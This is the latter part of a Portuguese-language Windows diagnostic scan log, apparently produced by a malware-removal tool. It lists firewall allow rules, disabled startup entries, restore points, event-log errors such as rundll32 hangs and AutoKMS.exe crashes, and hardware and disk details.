HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\gabri\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\16676012163_c43eca7d36_o.jpg
DNS Servers: 201.17.128.77 - 201.17.128.72
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

(Atualmente não há nenhuma correção automática para esta seção.)

HKLM\...\StartupApproved\StartupFolder: => "Inicialização Rápida do Solidworks 2014.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Aplicativo de Download Automático do SolidWorks.lnk"
HKLM\...\StartupApproved\Run: => "ETDCtrl"
HKLM\...\StartupApproved\Run32: => "ADSKAppManager"
HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\StartupApproved\Run: => "Akamai NetSession Interface"

==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{C47E57DA-4191-4DA0-AF2E-5614AF4B317E}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [{5FA1C321-9B8C-45DE-9FCC-2AC160A7F0EC}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [UDP Query User{CA035A35-4CA8-40C4-995D-14EBC95741EA}C:\program files (x86)\maxthon\bin\maxthon.exe] => (Allow) C:\program files (x86)\maxthon\bin\maxthon.exe
FirewallRules: [TCP Query User{A7B9B130-B253-4C0C-AAB6-7007B90B6488}C:\program files (x86)\maxthon\bin\maxthon.exe] => (Allow) C:\program files (x86)\maxthon\bin\maxthon.exe
FirewallRules: [{857723D4-D111-43A0-A9A8-96DA5254998B}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe
FirewallRules: [{07A3E502-0A97-4DAE-945E-1927DCB9FA39}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{743D21E4-0A91-4646-B76B-E712FCA230DA}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{5EE15CE9-B687-4327-B389-2C0CF704A17D}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{030E56DF-B24A-41C9-9D8C-35B6B56EE5F5}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6C122131-E5E3-4FE9-BC42-7E3AA4EE1CEA}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{01A6F848-B1FF-4E91-93CF-8E3A135E0071}] => (Allow) C:\Users\gabri\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [UDP Query User{C7B0C57C-9C4A-42C7-908F-CFC21BE7DD72}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe
FirewallRules: [TCP Query User{E55B8EA0-80E5-4845-858D-794D5224590E}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.6_42094.exe
FirewallRules: [{6B80180A-5FA5-4F04-BF41-5DDF45D5FD84}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{4ACD1FD1-578D-4F9F-A953-BF7F7A00EDBB}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{B085A7C4-CA3C-49E7-BFFC-FA3ADD9AF076}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{0BBCDC32-B883-4956-9C26-59EA61133C17}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [UDP Query User{5FB426E9-B8DD-45B9-A10B-D439250E2BD8}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe
FirewallRules: [TCP Query User{8EB802BA-99D9-4C30-B9A4-F030CDE32B0A}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41865.exe
FirewallRules: [UDP Query User{8369AC53-5EC9-42B5-85DE-040CF0FC44E4}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe
FirewallRules: [TCP Query User{45065BD2-D8A8-472E-AC45-EC93EFA5AF03}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41712.exe
FirewallRules: [UDP Query User{43CB3289-3FB5-4193-B8CD-CB807DBEB200}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe
FirewallRules: [TCP Query User{E5C37137-4421-43F0-9016-13E9AA351090}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41372.exe
FirewallRules: [{3A5BA617-E2A4-4CFE-834D-53E1954103B1}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{32B11E99-46AE-4DA1-9AB5-73826512DDC1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{03E0815D-45CD-42BF-8BC5-F581D787A231}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{7048C7F2-37AD-4A33-82C5-4EFF3CD87651}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{3BE8B9FC-FBEE-4413-B91B-CAF15FCEE4E9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{781EA6A4-4F09-4DC5-A1A8-4A81A412164D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe
FirewallRules: [{1EFD8FA6-33F3-4E2B-BE8E-D51155A99605}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe
FirewallRules: [{B916BF38-0541-4C51-917D-B61ED25E2E82}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{2BC9CF4F-7C4B-460A-AB88-2C4C64FC64A1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{E4ACB405-DDE3-4ACD-B2B3-48E67CB66A68}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{B180E70D-0C76-4259-8E36-D24FA5192F35}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{C54B1C61-C082-482B-A98D-FD503942B19E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{DB1BC2C2-BC75-4FF4-AAF2-B41BCA871708}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{E7AD6073-5D36-4C53-A55D-790E9BC1512E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{3C780E9F-A5D2-4F41-BBBD-4C14A80A65B3}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{617F487A-4693-4296-8628-3B65B6F8AF24}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{BA9BD23C-5620-45B5-B83C-CA095F8E0577}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{FCC6378D-3124-4158-8D4F-F644588DA149}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [{DDD5220C-7CA5-4902-BF93-CCE3CC5D2789}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [{D0EED423-A5B8-4815-B230-F23A5D40F02D}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{F6C3E009-3BB8-46E9-B37E-0C042C38D52E}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{5D684EE8-78F3-4F95-B3CB-36EEB2A16901}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{1F719180-3821-4E68-BBB9-A167D27F1B73}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{B15F9B45-4153-4B41-BF1E-B8F405894728}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{746F54FD-1C70-4B20-AEDA-E8AEE4068243}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{C9F70E75-5BE8-44FC-8965-A4951DB0A865}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{D4D82735-F642-4D0C-A422-8E14C4FB72C3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{C18CB6CE-94F9-46DD-ACF5-0741F3063B83}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{0FDF9E73-9EDE-46C9-BA1E-A34462554A69}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{8D2B2992-E994-4C57-AB32-F0F64E58AB73}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\gabri\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{1BDF3E28-BB2B-4BF2-AB37-70CA5913E636}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\gabri\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{25374537-EBC8-40A4-AB9F-92DA2E5A6BA0}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\gabri\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{53A16881-8BED-46AB-B5B8-73126B5D2767}C:\users\gabri\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\gabri\appdata\local\akamai\netsession_win.exe
FirewallRules: [{58A4089F-B65C-421A-BA9B-A09F8E370DBE}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{9CBA0D4B-A02C-4C3C-AE16-F3060F06E85A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C20E5AB6-8116-4A34-B3B2-30106D2F9394}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{2F28AC03-D7C2-4045-8C0B-AF6E352BF2F2}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{56AFD569-3AE9-4840-8FF2-B92C7F938D4D}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe
FirewallRules: [{52EB445D-A0AF-47FC-B168-A4CF3D4CF9B0}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe
FirewallRules: [{3E869D92-6DFC-49E8-B3D7-83F0BE93B9BD}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360.exe
FirewallRules: [{7A9A62DF-48BC-4DC6-B130-A6DFF39D4150}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360.exe
FirewallRules: [{4D7511F6-10B8-4443-8546-633E2F17CEF9}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360_cl.exe
FirewallRules: [{F126518A-F0DE-4EE0-A5BB-7D2948B4B0A8}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360_cl.exe
FirewallRules: [{408545C6-CE6A-4A8D-B616-FA8B84D0DE3C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A803E33F-9845-436F-AB9C-7CAADBB43873}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A18FECE9-799F-4F3D-AF13-5747104432BC}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{8FBE25F7-7064-4F78-8026-21728E1B6931}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{A69523AD-66DB-4749-833D-171B1F149D2B}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{AAF4F598-2A65-4C84-94B3-D31F268FC3DF}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [TCP Query User{E6B4284E-E1E6-4117-A7B8-2F451FA0F332}C:\program files (x86)\common files\nokia\fuse\fuseservice.exe] => (Allow) C:\program files (x86)\common files\nokia\fuse\fuseservice.exe
FirewallRules: [UDP Query User{8659FB35-FAD8-48F6-9E89-6628830A2B3F}C:\program files (x86)\common files\nokia\fuse\fuseservice.exe] => (Allow) C:\program files (x86)\common files\nokia\fuse\fuseservice.exe
FirewallRules: [TCP Query User{01EDDB8F-3911-40A7-BBAB-A5153FE880C9}C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe] => (Allow) C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe
FirewallRules: [UDP Query User{E5AFAB87-4930-4594-81F5-A61E80E43CD5}C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe] => (Allow) C:\program files (x86)\microsoft care suite\nokia software recovery tool\nokiasoftwarerecoverytool.exe
FirewallRules: [TCP Query User{ED7F16AA-3C35-42D9-AA01-F3A5AE450616}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe
FirewallRules: [UDP Query User{2C41E6EA-2E9D-4382-9110-DF9BE5CD4D19}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41162.exe
FirewallRules: [TCP Query User{158EEE99-E8E9-4FFB-A402-72707D11D8CC}C:\users\gabri\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{E1873135-FEEB-447E-A0BD-0ADCF2BD4BFF}C:\users\gabri\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{561F5DF3-5150-41AA-B2D7-AEF1EE1356C9}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe
FirewallRules: [UDP Query User{6D650BA7-A479-4A43-83C7-2DC52C346FD1}C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe] => (Allow) C:\users\gabri\appdata\roaming\utorrent\updates\3.4.5_41202.exe
FirewallRules: [{4535C5E7-DC5F-4C7B-8402-54A6DEF7BE1E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{786A8CC9-852C-4003-9B09-7DF1EC4CD96B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1C9E9DEF-C471-4940-8973-4789DBB1FE76}] => (Allow) C:\Program Files (x86)\Mr DJ\Fallout New Vegas Ultimate Edition\FalloutNVLauncher.exe
FirewallRules: [{D943BFCE-CB3F-4CDF-8BE5-A2BA9E091A78}] => (Allow) C:\Program Files (x86)\Mr DJ\Fallout New Vegas Ultimate Edition\FalloutNVLauncher.exe
FirewallRules: [TCP Query User{589DDBFF-6D69-431B-BF71-53E2DBF2027C}C:\games\counter-strike global offensive\csgo.exe] => (Allow) C:\games\counter-strike global offensive\csgo.exe
FirewallRules: [UDP Query User{F4E9A1BD-B760-44D5-BA7E-CB9D4C6AABFB}C:\games\counter-strike global offensive\csgo.exe] => (Allow) C:\games\counter-strike global offensive\csgo.exe

==================== Pontos de Restauração =========================

24-08-2016 23:13:49 Windows Update
31-08-2016 07:03:18 Windows Update
02-09-2016 20:13:51 Removed Importação do SketchUp 2016.

==================== Dispositivos Apresentando Falhas No Gerenciador =============

==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================
Error: (09/04/2016 07:09:26 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program rundll32.exe version 10.0.14393.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: 24d8

Start Time: 01d206f8f3876da8

Termination Time: 12

Application Path: C:\Windows\System32\rundll32.exe

Report Id: 3d1b2d4c-72ec-11e6-9c61-dc0ea101143d

Faulting package full name:

Faulting package-relative application ID:

Error: (09/04/2016 07:09:04 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program rundll32.exe version 10.0.14393.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: 263c

Start Time: 01d206f8ed306ac1

Termination Time: 15

Application Path: C:\Windows\System32\rundll32.exe

Report Id: 2f9eaf01-72ec-11e6-9c61-dc0ea101143d

Faulting package full name:

Faulting package-relative application ID:

Error: (09/04/2016 07:08:51 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program rundll32.exe version 10.0.14393.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: 243c

Start Time: 01d206f8d4da332b

Termination Time: 2

Application Path: C:\Windows\System32\rundll32.exe

Report Id: 28256b72-72ec-11e6-9c61-dc0ea101143d

Faulting package full name:

Faulting package-relative application ID:

Error: (09/04/2016 03:15:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: AutoKMS.exe, version: 2.5.0.0, time stamp: 0x52aef33f
Faulting module name: KERNELBASE.dll, version: 10.0.14393.0, time stamp: 0x57899809
Exception code: 0xe0434352
Fault offset: 0x0000000000017788
Faulting process id: 0x6b0
Faulting application start time: 0x01d206d77788daa1
Faulting application path: C:\WINDOWS\AutoKMS\AutoKMS.exe
Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll
Report Id: 6c655229-b962-44ed-b13a-21baddb2124d
Faulting package full name:
Faulting package-relative application ID:

Error: (09/04/2016 03:15:54 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplicativo: AutoKMS.exe
Versão do Framework: v4.0.30319
Descrição: O processo foi terminado devido a uma exceção sem tratamento.
Informações da Exceção: System.ArgumentException
em System.IO.FileStream..ctor(Microsoft.Win32.SafeHandles.SafeFileHandle, System.IO.FileAccess, Int32, Boolean)
em ..()
em System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
em System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
em System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
em System.Threading.ThreadHelper.ThreadStart()

Error: (09/04/2016 03:10:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: NvStreamUserAgent.exe, version: 7.1.2084.9592, time stamp: 0x57605c64
Faulting module name: ntdll.dll, version: 10.0.14393.103, time stamp: 0x57b7e207
Exception code: 0xc0000005
Fault offset: 0x000000000003061d
Faulting process id: 0x9c0
Faulting application start time: 0x01d206d799fc7d00
Faulting application path: C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: aa68b49f-a14d-46e8-8274-82a7dbe69ad5
Faulting package full name:
Faulting package-relative application ID:

Error: (09/03/2016 06:57:42 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-G8E168K)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2147023673 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (09/03/2016 06:57:40 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-G8E168K)
Description: Activation of app Microsoft.LockApp_cw5n1h2txyewy!WindowsDefaultLockScreen failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (09/03/2016 06:57:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2486) (User: DESKTOP-G8E168K)
Description: App Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy+WindowsDefaultLockScreen did not launch within its allotted time.

Error: (09/03/2016 06:28:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: AutoKMS.exe, version: 2.5.0.0, time stamp: 0x52aef33f
Faulting module name: KERNELBASE.dll, version: 10.0.14393.0, time stamp: 0x57899809
Exception code: 0xe0434352
Fault offset: 0x0000000000017788
Faulting process id: 0x1794
Faulting application start time: 0x01d20611b4f451ca
Faulting application path: C:\WINDOWS\AutoKMS\AutoKMS.exe
Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll
Report Id: c8a57f1d-3838-4bce-9dd7-460afef68178
Faulting package full name:
Faulting package-relative application ID:

Erros de Sistema:
=============
Error: (09/04/2016 07:16:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-G8E168K)
Description: The server Cortana.ActionUris.ActionUri did not register with DCOM within the required timeout.

Error: (09/04/2016 07:15:19 PM) (Source: Microsoft-Windows-NDIS) (EventID: 10317) (User: AUTORIDADE NT)
Description: Miniport TAP-Windows Adapter V9 #3, {697C671E-F8A8-42A0-86E2-9A82F6FD67A4}, had event 76

Error: (09/04/2016 07:11:54 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: The específico do aplicativo permission settings do not grant Local Ativação permission for the COM Server application with CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
and APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
to the user AUTORIDADE NT\SISTEMA SID (S-1-5-18) from address LocalHost (Usando LRPC) running in the application container Não Disponível SID (Não Disponível). This security permission can be modified using the Component Services administrative tool.

Error: (09/04/2016 07:06:55 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT)
Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.

Code: 8 0x0 0x0

Error: (09/04/2016 07:06:53 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT)
Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.

Code: 2 0xdeaddeed 0xeeec

Error: (09/04/2016 07:06:53 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT)
Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.

Code: 1 0xc 0x4

Error: (09/04/2016 06:27:39 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: The específico do aplicativo permission settings do not grant Local Ativação permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
to the user AUTORIDADE NT\SISTEMA SID (S-1-5-18) from address LocalHost (Usando LRPC) running in the application container Não Disponível SID (Não Disponível). This security permission can be modified using the Component Services administrative tool.

Error: (09/04/2016 05:20:44 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT)
Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.

Code: 8 0x0 0x0

Error: (09/04/2016 05:20:41 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT)
Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.

Code: 2 0xdeaddeed 0xeeec

Error: (09/04/2016 05:20:41 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: AUTORIDADE NT)
Description: WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.

Code: 1 0xc 0x4

CodeIntegrity:
===================================
Date: 2016-09-03 22:03:20.241
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\nvami.inf_amd64_fd2cdd92cf7ee187\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-03 22:03:19.712
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 23:26:16.076
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

Date: 2016-09-02 22:12:25.544
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-02 22:12:25.330
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Informações da Memória ===========================

Processador: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Percentagem de memória em uso: 32%
RAM física total: 8069.53 MB
RAM física disponível: 5454.95 MB
Virtual Total: 9349.53 MB
Virtual disponível: 6780.58 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:697.92 GB) (Free:471.71 GB) NTFS

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 7AB4F75A)

Partition: GPT.

==================== Fim de Addition.txt ============================

Signaler le contenu de ce document